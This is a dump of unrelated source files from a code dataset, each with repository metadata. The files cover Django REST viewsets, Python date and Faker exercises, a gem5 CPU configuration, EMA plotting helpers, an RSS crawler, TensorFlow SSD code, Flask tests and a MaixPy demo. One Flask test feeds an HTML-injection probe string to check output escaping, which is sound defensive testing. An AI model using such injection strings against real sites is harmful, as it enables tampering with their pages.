Python
| false
| false
| 368
|
py
|
from django.shortcuts import render
# Create your views here.
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import ModelViewSet
from .models import Item
from .serializers import ItemSerializer
class ItemViewSet(ModelViewSet):
    """Full CRUD REST endpoint over all todo Items.

    NOTE(review): permission_classes = [AllowAny] leaves the endpoint fully
    open to anonymous clients -- confirm this is intended outside local
    development.
    """
    queryset = Item.objects.all()
    serializer_class = ItemSerializer
    permission_classes = [AllowAny]
|
[
"chelsejw@gmail.com"
] |
chelsejw@gmail.com
|
13ee98f47946a5208c92ef8471cee9c16fb70363
|
dd8c2b417ea6ad2360cf1a21a7eeb99b7b7ca459
|
/Week 5/Day 3/XP/modulesXP.py
|
83a413e5776033a07b2ab6aa2deeb88129de2f6e
|
[] |
no_license
|
nsal-ai/DI_Bootcamp
|
028d6eb342294bd0ce5bc159b1f39b4d5880c981
|
6331f895237b6b51b8dbf291d15e34ccaaad72ba
|
refs/heads/main
| 2023-05-22T13:34:07.568245
| 2021-06-11T16:02:32
| 2021-06-11T16:02:32
| 354,993,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,787
|
py
|
# import datetime as dt
# date1 = dt.datetime.today()
# print(date1)
import time, datetime
today_date = datetime.date.today()
future_date = datetime.date(2022,1,1)
diff = future_date - today_date
print(diff.days)
import datetime, time
ny_22 = datetime.date(2022, 1, 1) - datetime.date.today()
print(ny_22)
from datetime import datetime
val1 = datetime.now()
val2 = datetime(2022, 1, 1, 00, 00, 00)
print(val2 - val1)
print(f'The 1st of January in {val2 - val1} hours')
def mins_alive(year, month, day):
    """Print the number of whole minutes elapsed since the given birth date."""
    birth = datetime(year, month, day)
    elapsed = datetime.now() - birth
    minutes = int(elapsed.total_seconds() / 60)
    print(f'you have been alive for {minutes} minutes')
string = "19 Nov 2015 18:45:00.000"
date = datetime.strptime(string, "%d %b %Y %H:%M:%S.%f")
print(date)
def time_to_holiday(year, month, day, holiday='Chanukah'):
    """Print how long remains from now until the given holiday date."""
    now_date = datetime.now()
    holiday_date = datetime(year, month, day)
    # timedelta until the holiday; the message calls it "hours" but a
    # timedelta renders as days + H:MM:SS, so the wording is approximate.
    time_left = holiday_date - now_date
    print(f'The next holiday is {holiday} and is in {time_left} hours')
time_to_holiday(2021, 9, 15)
def age_on_planet(planet, orbital_period, seconds):
    """Convert an age in seconds to years on `planet`.

    orbital_period is the planet's year length in Earth years (Earth = 1);
    31557600 is the number of seconds in one Julian Earth year.
    NOTE(review): the computed value is the age in *that planet's* years,
    so the local name `earth_years` and the printed "Earth-years" look
    mislabelled -- confirm intent before renaming.
    """
    earth_years = seconds/(31557600*orbital_period)
    print(f'You are {earth_years} Earth-years old on {planet}')
from faker import Faker
faker = Faker()
print(f'name: {faker.name()}')
def populate_users():
    """Build and print a one-element list containing a random fake profile."""
    users = []
    # Faker's provider is spelled language_code(); the original called the
    # misspelled `langage_code`, which raises AttributeError at runtime.
    # The matching dict key is corrected too.
    profile = {'name': faker.name(), 'address': faker.address(), 'language_code': faker.language_code()}
    users.append(profile)
    print(users)
# try:
# import timedelta
# print('module time is installed')
# except ModuleNotFoundError:
# print('module time is not installed')
|
[
"nigel.salem@rocketmail.com"
] |
nigel.salem@rocketmail.com
|
3e81fbe984615e1803e95416d5ffff5e86447a53
|
c25ea06dcae67540973fde2e10be62e6002df2f0
|
/backoffice/views/item.py
|
0f1815572cd6e1c749649e20b69eb0d14de9de76
|
[] |
no_license
|
Youngiyong/giyong-api
|
df021c1bc0b147021f74f05eef714d85e0e055f4
|
dbd723fa1e2312537d545ac125d6bdc2349ccab2
|
refs/heads/main
| 2023-07-04T12:34:26.090858
| 2021-08-10T13:33:34
| 2021-08-10T13:33:34
| 390,406,924
| 1
| 1
| null | 2021-08-05T15:06:16
| 2021-07-28T15:46:27
|
Python
|
UTF-8
|
Python
| false
| false
| 731
|
py
|
from rest_framework import viewsets
from backoffice.models import SiteGoods
from backoffice.serializers.item import ItemSerializer
from giyong.responses import BackOfficeResponse
class ItemListViewSet(viewsets.GenericViewSet):
    """Read-only listing of site goods (items) for the back office."""
    model = SiteGoods
    serializer_class = ItemSerializer

    def get_queryset(self):
        # All rows; any filtering is applied by filter_queryset() in list().
        return self.model.objects.all()

    def list(self, request, *args, **kwargs):
        queryset = self.filter_queryset(self.get_queryset())
        # Read path: serialize the queryset directly.  The original passed
        # {"request": request} as the serializer's positional `data` argument
        # and then called is_valid(), which validates *input* instead of
        # rendering output (and would fail against a queryset instance);
        # get_serializer() already injects the request via serializer context.
        serializer = self.get_serializer(queryset, many=True)
        return BackOfficeResponse(data=serializer.data)
|
[
"youn9354@naver.com"
] |
youn9354@naver.com
|
82548f0b1cfae60c5a691672836b84e9b191992e
|
ae5e5c1bb869fd72598aa94a549161aab02a2d51
|
/configs/common/O3_ARM_v7a.py
|
bbcec74963d96e8bef2f1888679659bd96dea191
|
[] |
no_license
|
chrisjia6412/GEM5
|
89a74df84a7be6edf348384d9716e5da837a472d
|
260c5090de84ddbd1a42fab436ba34ed64a63c91
|
refs/heads/master
| 2021-01-13T01:55:10.875601
| 2014-07-12T19:37:01
| 2014-07-12T19:37:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,294
|
py
|
# Copyright (c) 2012 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ron Dreslinski
from m5.objects import *
# Simple ALU Instructions have a latency of 1
class O3_ARM_v7a_Simple_Int(FUDesc):
opList = [ OpDesc(opClass='IntAlu', opLat=1) ]
count = 2
# Complex ALU instructions have a variable latencies
class O3_ARM_v7a_Complex_Int(FUDesc):
opList = [ OpDesc(opClass='IntMult', opLat=3, issueLat=1),
OpDesc(opClass='IntDiv', opLat=12, issueLat=12),
OpDesc(opClass='IprAccess', opLat=3, issueLat=1) ]
count = 1
# Floating point and SIMD instructions
class O3_ARM_v7a_FP(FUDesc):
opList = [ OpDesc(opClass='SimdAdd', opLat=4),
OpDesc(opClass='SimdAddAcc', opLat=4),
OpDesc(opClass='SimdAlu', opLat=4),
OpDesc(opClass='SimdCmp', opLat=4),
OpDesc(opClass='SimdCvt', opLat=3),
OpDesc(opClass='SimdMisc', opLat=3),
OpDesc(opClass='SimdMult',opLat=5),
OpDesc(opClass='SimdMultAcc',opLat=5),
OpDesc(opClass='SimdShift',opLat=3),
OpDesc(opClass='SimdShiftAcc', opLat=3),
OpDesc(opClass='SimdSqrt', opLat=9),
OpDesc(opClass='SimdFloatAdd',opLat=5),
OpDesc(opClass='SimdFloatAlu',opLat=5),
OpDesc(opClass='SimdFloatCmp', opLat=3),
OpDesc(opClass='SimdFloatCvt', opLat=3),
OpDesc(opClass='SimdFloatDiv', opLat=3),
OpDesc(opClass='SimdFloatMisc', opLat=3),
OpDesc(opClass='SimdFloatMult', opLat=3),
OpDesc(opClass='SimdFloatMultAcc',opLat=1),
OpDesc(opClass='SimdFloatSqrt', opLat=9),
OpDesc(opClass='FloatAdd', opLat=5),
OpDesc(opClass='FloatCmp', opLat=5),
OpDesc(opClass='FloatCvt', opLat=5),
OpDesc(opClass='FloatDiv', opLat=9, issueLat=9),
OpDesc(opClass='FloatSqrt', opLat=33, issueLat=33),
OpDesc(opClass='FloatMult', opLat=4) ]
count = 2
# Load/Store Units
class O3_ARM_v7a_Load(FUDesc):
opList = [ OpDesc(opClass='MemRead',opLat=2) ]
count = 1
class O3_ARM_v7a_Store(FUDesc):
opList = [OpDesc(opClass='MemWrite',opLat=2) ]
count = 1
# Functional Units for this CPU
class O3_ARM_v7a_FUP(FUPool):
FUList = [O3_ARM_v7a_Simple_Int(), O3_ARM_v7a_Complex_Int(),
O3_ARM_v7a_Load(), O3_ARM_v7a_Store(), O3_ARM_v7a_FP()]
# Tournament Branch Predictor
class O3_ARM_v7a_BP(BranchPredictor):
predType = "tournament"
localPredictorSize = 2048
localCtrBits = 2
localHistoryTableSize = 1024
globalPredictorSize = 8192
globalCtrBits = 2
choicePredictorSize = 8192
choiceCtrBits = 2
BTBEntries = 2048
BTBTagSize = 18
RASSize = 16
instShiftAmt = 2
class O3_ARM_v7a_3(DerivO3CPU):
LQEntries = 16
SQEntries = 16
LSQDepCheckShift = 0
LFSTSize = 1024
SSITSize = 1024
decodeToFetchDelay = 1
renameToFetchDelay = 1
iewToFetchDelay = 1
commitToFetchDelay = 1
renameToDecodeDelay = 1
iewToDecodeDelay = 1
commitToDecodeDelay = 1
iewToRenameDelay = 1
commitToRenameDelay = 1
commitToIEWDelay = 1
fetchWidth = 3
fetchBufferSize = 16
fetchToDecodeDelay = 3
decodeWidth = 3
decodeToRenameDelay = 2
renameWidth = 3
renameToIEWDelay = 1
issueToExecuteDelay = 1
dispatchWidth = 6
issueWidth = 8
wbWidth = 8
wbDepth = 1
fuPool = O3_ARM_v7a_FUP()
iewToCommitDelay = 1
renameToROBDelay = 1
commitWidth = 8
squashWidth = 8
trapLatency = 13
backComSize = 5
forwardComSize = 5
numPhysIntRegs = 128
numPhysFloatRegs = 128
numIQEntries = 32
numROBEntries = 40
switched_out = False
branchPred = O3_ARM_v7a_BP()
# Instruction Cache
class O3_ARM_v7a_ICache(BaseCache):
hit_latency = 1
response_latency = 1
mshrs = 2
tgts_per_mshr = 8
size = '32kB'
assoc = 4
is_top_level = 'true'
# Data Cache
class O3_ARM_v7a_DCache(BaseCache):
hit_latency = 2
response_latency = 2
mshrs = 6
tgts_per_mshr = 8
size = '32kB'
assoc = 8
write_buffers = 16
is_top_level = 'true'
# TLB Cache
# Use a cache as a L2 TLB
class O3_ARM_v7aWalkCache(BaseCache):
hit_latency = 4
response_latency = 4
mshrs = 6
tgts_per_mshr = 8
size = '1kB'
assoc = 8
write_buffers = 16
is_top_level = 'true'
# L2 Cache
class O3_ARM_v7aL2(BaseCache):
hit_latency = 12
response_latency = 12
mshrs = 16
tgts_per_mshr = 8
size = '1MB'
assoc = 16
write_buffers = 8
prefetch_on_access = 'true'
# Simple stride prefetcher
prefetcher = StridePrefetcher(degree=8, latency = 1)
|
[
"qi@qi-VirtualBox.(none)"
] |
qi@qi-VirtualBox.(none)
|
350ffd8fca7ec36b99c6cffa4ee976cbf5f708c8
|
493d280a1c687711d3aed80ddade8e19848c0234
|
/venv/bin/django-admin.py
|
827bcc6fa1d5c23aca50a8fcdc385a3a56eb5a49
|
[] |
no_license
|
GeovaneBarros/Venda-Produtos
|
d88d6ad5fa06c761c7bdb096ae84d75b19de8a82
|
b8a94f7d64292e0126ecc27d43057bdbcb558626
|
refs/heads/master
| 2023-07-03T05:58:39.489996
| 2021-08-03T15:02:10
| 2021-08-03T15:02:10
| 388,113,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 697
|
py
|
#!/home/geovane/Documentos/git/Venda-Produtos/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
|
[
"geovane@pop-os.localdomain"
] |
geovane@pop-os.localdomain
|
fccd084a55ab599772595c582a1d51697189a8a5
|
7bf91a0bd76d02c3f15952b851e6c32f190f5619
|
/EMAHelperFunctions.py
|
d2f0b8203bc0eff91aafe947961002e5ecc278fc
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
kilolux/fsp-demos
|
bd4d21ddf5b8c0a25621842d3b2a6ee6c096d9ac
|
50e96a10729477042b10291471c812d10bfd54fc
|
refs/heads/master
| 2021-04-12T19:10:25.381198
| 2020-11-16T00:26:59
| 2020-11-16T00:26:59
| 249,102,873
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
# EMAHelperFunctions.py
#################################################################
## Libraries
import matplotlib.pyplot as plt
import numpy as np
################################################################
## Exponential Moving Average (EMA) Functions
# Calculate the alpha value for a desired period.
def calculateAlpha(ema_period):
    """Smoothing factor for an EMA over `ema_period` terms: 2 / (N + 1)."""
    return 2.0 / (ema_period + 1)
# Returns the denominator
def getDenominator(number_of_terms):
    """Sum of the EMA weight series 1 + (1-a) + (1-a)^2 + ...
    over `number_of_terms` terms."""
    # Smoothing factor; same formula as calculateAlpha(number_of_terms),
    # inlined so this helper stands alone.
    a = 2.0 / (number_of_terms + 1)
    # Geometric series summed with the builtin instead of a manual
    # while-loop accumulator.
    return sum((1 - a) ** i for i in range(number_of_terms))
# Returns the numerator
def getNumerator(price_data, price_data_index, number_of_terms):
    """Weighted price sum p[i] + (1-a)p[i-1] + (1-a)^2 p[i-2] + ...,
    walking `number_of_terms` samples backwards from
    price_data[price_data_index]."""
    # Smoothing factor (== calculateAlpha(number_of_terms)), inlined so the
    # helper stands alone.
    a = 2.0 / (number_of_terms + 1)
    # sum + generator replaces the manual while-loop accumulator.
    return sum(price_data[price_data_index - i] * (1 - a) ** i
               for i in range(number_of_terms))
# Returns a single Exponential Moving Average value.
def getEMA(price_data, price_data_index, number_of_terms):
    """Single EMA value at `price_data_index`, or 0.0 when there is not
    enough history before the index to cover `number_of_terms` samples.

    Returns a plain float in both branches.  The original returned int 0 on
    the short-history branch but a 1-element ndarray otherwise; assigning
    that size-1 array into a scalar slot (as getEMAdataset does) is
    deprecated and rejected by modern NumPy.
    """
    if (number_of_terms - price_data_index) > 1:
        # There are too many terms for the given index.
        return 0.0
    top = getNumerator(price_data, price_data_index, number_of_terms)
    bottom = getDenominator(number_of_terms)
    return top / bottom
# Returns a list of all EMA values.
def getEMAdataset(price_data, number_of_terms):
    """EMA value for every index of `price_data`, as a float ndarray."""
    # float() collapses either return shape of getEMA (scalar, or the
    # 1-element array the original version returned), so this works with
    # both old and new getEMA and avoids NumPy's rejection of size-1-array
    # scalar assignment.
    return np.array([float(getEMA(price_data, i, number_of_terms))
                     for i in range(np.size(price_data))])
####################################################################
## Plotting Function
# Plots 3 lines: raw data, EMA(period_1), EMA(period_2)
def calculateAndPlotEMA(data, ema_period_1, ema_period_2):
ema_1 = getEMAdataset(data, ema_period_1)
ema_2 = getEMAdataset(data, ema_period_2)
x = np.arange(len(data))
plt.plot(x, data)
plt.plot(x, ema_1)
plt.plot(x, ema_2)
ema_legend_text_1 = "EMA(" + str(ema_period_1) + ")"
ema_legend_text_2 = "EMA(" + str(ema_period_2) + ")"
plt.legend(['Value', ema_legend_text_1, ema_legend_text_2])
plt.title("Exponential Moving Averages")
plt.grid(b=True, which='major', color='gray', linestyle=':')
plt.show()
########################################################################
## Sine Wave Function
# Generates a sine wave.
def generateSineWave(period, amplitude, sigma, end):
# Equations
alpha = amplitude / 2.0
beta = 2.0 * np.pi / period
frequency = 1.0 / period
x = np.arange(end + 1)
# Formula
y = alpha * np.sin(beta * x) + sigma
return y
|
[
"62257394+kilolux@users.noreply.github.com"
] |
62257394+kilolux@users.noreply.github.com
|
3d9d02fab501c681dd1ecb74fe34e9407ee3211e
|
2347a00aa41c023924de6bc4ffe0e8bc244a0f3f
|
/cms/apps.py
|
5c0101c5a82df0a517f36f405d25b64ac9d404f2
|
[] |
no_license
|
Dean-Christian-Armada/prod-people
|
2ac20d16aecb0cf1ae50a08e456060eee270b518
|
fb8d99394d78bbf4d1831223fce2d7ac4a04f34d
|
refs/heads/master
| 2021-01-01T16:19:36.904967
| 2016-01-26T09:20:36
| 2016-01-26T09:20:36
| 42,503,579
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
from django.apps import AppConfig
class YourAppConfig(AppConfig):
name = 'cms'
verbose_name = 'CMS Tables (Currently used in Documents only)'
|
[
"deanarmada@gmail.com"
] |
deanarmada@gmail.com
|
f3b885e952ddfedae93e7977d0e6c7f127bbdd7f
|
d7bfd78bdffdbf5a75141b06f7e4b94c295d0781
|
/models/ssd_mobilenet_v1_feature_extractor.py
|
844731cc6fa4e7a3f42b3e1e6fdf55deb6a67db2
|
[] |
no_license
|
shamanez/SSD-TF-OD
|
c4fa864851d289c99d7b56a95dda3b135d0a4520
|
6014db3ab275dd99fa779af16b6ec5a8a29bfb87
|
refs/heads/master
| 2021-01-19T14:21:03.754648
| 2017-09-07T23:00:16
| 2017-09-07T23:00:16
| 100,898,399
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,151
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSDFeatureExtractor for MobilenetV1 features."""
import tensorflow as tf
from object_detection.meta_architectures import ssd_meta_arch
from object_detection.models import feature_map_generators
from nets import mobilenet_v1
slim = tf.contrib.slim
class SSDMobileNetV1FeatureExtractor(ssd_meta_arch.SSDFeatureExtractor): #this is the feature extractor class
"""SSD Feature Extractor using MobilenetV1 features."""
def __init__(self,
depth_multiplier, #this uses feature extrator convolutional hipher parameters
min_depth,
conv_hyperparams,
reuse_weights=None):
"""MobileNetV1 Feature Extractor for SSD Models.
Args:
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
conv_hyperparams: tf slim arg_scope for conv2d and separable_conv2d ops.
reuse_weights: Whether to reuse variables. Default is None.
"""
super(SSDMobileNetV1FeatureExtractor, self).__init__(
depth_multiplier, min_depth, conv_hyperparams, reuse_weights)
def preprocess(self, resized_inputs):
"""SSD preprocessing.
Maps pixel values to the range [-1, 1].
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
return (2.0 / 255.0) * resized_inputs - 1.0
def extract_features(self, preprocessed_inputs): #this will extract features from iamge w.r.t mobilenet archtecture
"""Extract features from preprocessed inputs.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
feature_maps: a list of tensors where the ith tensor has shape
[batch, height_i, width_i, depth_i]
"""
preprocessed_inputs.get_shape().assert_has_rank(4)
shape_assert = tf.Assert(
tf.logical_and(tf.greater_equal(tf.shape(preprocessed_inputs)[1], 33),
tf.greater_equal(tf.shape(preprocessed_inputs)[2], 33)),
['image size must at least be 33 in both height and width.'])
feature_map_layout = {
'from_layer': ['Conv2d_11_pointwise', 'Conv2d_13_pointwise', '', '', #we first extract 2 layers from mobilenet
'', ''],
'layer_depth': [-1, -1, 512, 256, 256, 128], #for first two things it's -1 means we directly take the depth as in the feature maps
}
with tf.control_dependencies([shape_assert]):
#with following we apply all the hyperparams in the scrip by keeping arg scope free
with slim.arg_scope(self._conv_hyperparams): #arg score - Here the convolutional hyper params are for feature extractor we create ot
with tf.variable_scope('MobilenetV1',
reuse=self._reuse_weights) as scope:
_, image_features = mobilenet_v1.mobilenet_v1_base( #getting the feature extracted from mobilnet in the slim
preprocessed_inputs,
final_endpoint='Conv2d_13_pointwise', #this is extracting the features
min_depth=self._min_depth, #our min deph is 16 , It's like our depth of the feature extator
depth_multiplier=self._depth_multiplier, #there is 1 we take all the layers in depth demension
scope=scope) #this is a dicrionalt with names of the feature maps and feature maps
#the following function can extract the features from above feature maps , also it can create new one's too acording to the output stride thing which we are not using Alos we give a featue map lay_out what should be there , and this also can create addicitonal feature maps
feature_maps = feature_map_generators.multi_resolution_feature_maps( #This is for generating feature maps
feature_map_layout=feature_map_layout, #wanted feature maps extracted from above model maps and create new maps for empty things
depth_multiplier=self._depth_multiplier, #depth multi-plier
min_depth=self._min_depth, #this is 16
insert_1x1_conv=True, #
image_features=image_features) #feature dictionary
return feature_maps.values() #list of 6 feature maps for the ssd
|
[
"noreply@github.com"
] |
shamanez.noreply@github.com
|
b64206a2f26f54d43768e905ca9eff0c32090d13
|
447e493fddbf4d7c6496050e5f5c7b6f4f4a9a1f
|
/lib/tfflat/saver.py
|
0e32673894271849c6c346f911aa321478b3421d
|
[] |
no_license
|
mks0601/TF-SimpleHumanPose
|
46e1fb1c54c7c33305edcdef9de0c187a1abce89
|
58cc1ca86e302ba3d426c10e7c8030a6b2d00158
|
refs/heads/master
| 2022-07-11T15:00:29.350604
| 2022-07-01T03:17:33
| 2022-07-01T03:17:33
| 164,132,208
| 360
| 96
| null | 2019-05-24T12:43:59
| 2019-01-04T16:49:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,420
|
py
|
import tensorflow as tf
from tensorflow.python import pywrap_tensorflow
import numpy as np
from config import cfg
import os
import os.path as osp
def get_variables_in_checkpoint_file(file_name):
try:
reader = pywrap_tensorflow.NewCheckpointReader(file_name)
var_to_shape_map = reader.get_variable_to_shape_map()
return reader, var_to_shape_map
except Exception as e: # pylint: disable=broad-except
print(str(e))
if "corrupted compressed block contents" in str(e):
print(
"It's likely that your checkpoint file has been compressed "
"with SNAPPY.")
class Saver(object):
def __init__(self, sess, var_list, model_dump_dir, name_prefix='snapshot'):
self.sess = sess
self.var_list = var_list
self.model_dump_dir = model_dump_dir
self._name_prefix = name_prefix
self.saver = tf.train.Saver(var_list=var_list, max_to_keep=100000)
def save_model(self, iter):
filename = '{}_{:d}'.format(self._name_prefix, iter) + '.ckpt'
if not os.path.exists(self.model_dump_dir):
os.makedirs(self.model_dump_dir)
filename = os.path.join(self.model_dump_dir, filename)
self.saver.save(self.sess, filename)
print('Wrote snapshot to: {:s}'.format(filename))
def load_model(sess, model_path):
#TODO(global variables ?? how about _adam weights)
variables = tf.global_variables()
reader, var_keep_dic = get_variables_in_checkpoint_file(model_path)
if 'global_step' in var_keep_dic:
var_keep_dic.pop('global_step')
# vis_var_keep_dic = []
variables_to_restore = {}
changed_variables = {}
for v in variables:
v_name = v.name.split(':')[0]
if v_name in var_keep_dic:
# print('Varibles restored: %s' % v.name)
#variables_to_restore.append(v)
variables_to_restore[v_name] = v
# vis_var_keep_dic.append(v.name.split(':')[0])
else:
# print('Unrestored Variables: %s' % v.name)
pass
# print('Extra Variables in ckpt', set(var_keep_dic) - set(vis_var_keep_dic))
if len(variables_to_restore) > 0:
restorer = tf.train.Saver(variables_to_restore)
restorer.restore(sess, model_path)
else:
print('No variables in {} fits the network'.format(model_path))
|
[
"mks0601@gmail.com"
] |
mks0601@gmail.com
|
8e34d4ac2b102606b68cc04de8de6218ce2c7fe6
|
396b4d5a3361dda0afc3a05ab06ed4b5aa8fa59a
|
/thinkhard/feedcrawler.py
|
b3d0d4b5782ebbf1834778b0da27fcee2195ed67
|
[] |
no_license
|
darlinglele/portal
|
7a0a8e410032fef3040d0b350254a3e044ee9c65
|
5f5265f06ee65aa98ee9e03a95f6433cac7fd36c
|
refs/heads/master
| 2020-05-29T12:36:55.817604
| 2018-02-02T05:59:27
| 2018-02-02T05:59:27
| 42,295,790
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,299
|
py
|
#encoding=utf8
import time
from datetime import datetime
from time import mktime
import socket
import feedparser
import threadpool
class FeedCrawler():
def __init__(self,task):
socket.setdefaulttimeout(task['timeout'])
self.pool =threadpool.ThreadPool(task['pool_size'])
self.sources = task['sources']
self.feeds = []
def request(self,source):
try:
feeder = feedparser.parse(source)
if 'title' in feeder.feed.keys():
site_title = feeder.feed['title']
else:
site_title =u"No title found"
for entry in feeder.entries:
feed = {'site_url': source,'site_title': unicode(site_title)}
for item in ['title', 'link','summary','content','published_parsed','tags','author','summary_detail']:
if item in entry.keys():
feed[item] =entry[item]
feed['published_parsed']=datetime.fromtimestamp(mktime(feed['published_parsed']))
if 'content' not in feed.keys():
feed['content'] = feed['summary']
else:
feed['content'] = feed['content'][0]['value']
self.feeds.append(feed)
except Exception, e:
print e
def crawl(self):
requests = threadpool.makeRequests(self.request,self.sources, None)
for req in requests:
self.pool.putRequest(req)
self.pool.wait()
self.pool.wait()
return self.feeds
|
[
"ubuntu@ip-172-31-12-43.ap-northeast-1.compute.internal"
] |
ubuntu@ip-172-31-12-43.ap-northeast-1.compute.internal
|
f3b0d783e5c1cb327f39b4a39392f55baaebe8a5
|
3ab965efcb9f20502a6420a844204b1d825268fa
|
/identidock/app/tests.py
|
c470e8821e66e25cc426f159cf41b06d2da8b050
|
[] |
no_license
|
kovtalex/deploying-containers
|
456118ff39e2fdcc3107f0be68662c301af221cf
|
cce61d8dea56a543e1e929dacfca6585385d79c4
|
refs/heads/master
| 2021-03-27T21:24:57.851820
| 2020-04-01T13:36:33
| 2020-04-01T13:36:33
| 247,808,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 613
|
py
|
import unittest
import identidock
class TestCase(unittest.TestCase):
def setUp(self):
identidock.app.config["TESTING"] = True
self.app = identidock.app.test_client()
def test_get_mainpage(self):
page = self.app.post("/", data=dict(name="Moby Dock"))
assert page.status_code == 200
assert 'Hello' in str(page.data)
assert 'Moby Dock' in str(page.data)
def test_html_escaping(self):
page = self.app.post("/", data=dict(name='"><b>TEST</b><!--'))
assert '<b>' not in str(page.data)
if __name__ == '__main__':
unittest.main()
|
[
"kovtalex@gmail.com"
] |
kovtalex@gmail.com
|
2284ba207ad2b43f708f3b94f9c3b91c002d5c4f
|
1d7acb2644c84490347360716c11c9a672820cd4
|
/ejecutable python/kmodelV4/main.py
|
e8707a1e8a34ca919de822b393b27cac3045da79
|
[
"Apache-2.0"
] |
permissive
|
SalvadorAlbarran/TFG2020
|
038345efd9cadac844cff1cc3cf6281d09ab38e8
|
ff2b6eae1a49b0b7f88909816ce18a0d1baad832
|
refs/heads/master
| 2022-11-07T12:47:08.571305
| 2020-06-24T15:58:43
| 2020-06-24T15:58:43
| 269,429,489
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 826
|
py
|
import sensor, image, lcd, time
import KPU as kpu
lcd.init()
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.set_windowing((224, 224))
sensor.set_vflip(1)
sensor.run(1)
lcd.clear()
lcd.draw_string(100,96,"MobileNet Demo")
lcd.draw_string(100,112,"Loading labels...")
f=open('labels.txt','r')
labels=f.readlines()
f.close()
task = kpu.load(0x200000)
a=kpu.set_outputs(task, 0, 1,1,1000) #it is add for V4
clock = time.clock()
while(True):
img = sensor.snapshot()
clock.tick()
fmap = kpu.forward(task, img)
fps=clock.fps()
plist=fmap[:]
pmax=max(plist)
max_index=plist.index(pmax)
a = lcd.display(img, oft=(0,0))
lcd.draw_string(0, 224, "%.2f:%s "%(pmax, labels[max_index].strip()))
print(fps)
a = kpu.deinit(task)
|
[
"66437479+SalvadorAlbarran@users.noreply.github.com"
] |
66437479+SalvadorAlbarran@users.noreply.github.com
|
011825657f266fd4b31c7a7d63955508c7cb9c0e
|
9e4349e34cf4ef17795142c8a46a347b3452738d
|
/.idea/python/Cosmonauts 1st HW.py
|
dcac485681d12e36341a48ba712fc2f28d079d8f
|
[] |
no_license
|
GreeNicee/SkillboxHM
|
5a1a88dabe7584d572218adb6acb00c3db9dd30e
|
c3538a3a33b641491f2acd33c5664e4ace0435b9
|
refs/heads/master
| 2020-04-01T10:20:38.961643
| 2018-10-15T13:33:35
| 2018-10-15T13:33:35
| 153,113,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,087
|
py
|
# Есть список космонавтов: имя, рост в см, вес в кг.
#Нужно вывести на консоль список всех космонавтов в формате
# Космонавт AAA, рост - BBB см, вес - CC кг
#А затем нужно вывести общее число космонавтов,
#минимальный и максимальный рост (с указанием имен)
#и общий вес космонавтов
#в формате
# Всего космонавтов XX человек.
# Минимальный рост - NNN см у XXX.
# Максимальный рост - NNN см у XXX.
# Общий вес космонавтов - ZZZ кг
cosmonauts = [
['Гагарин Юрий Алексеевич', 157, 68],
['Гайдуков Сергей Николаевич', 168, 72],
['Геворкян Владимир Мкртычович', 161, 70],
['Глазков Юрий Николаевич', 186, 95],
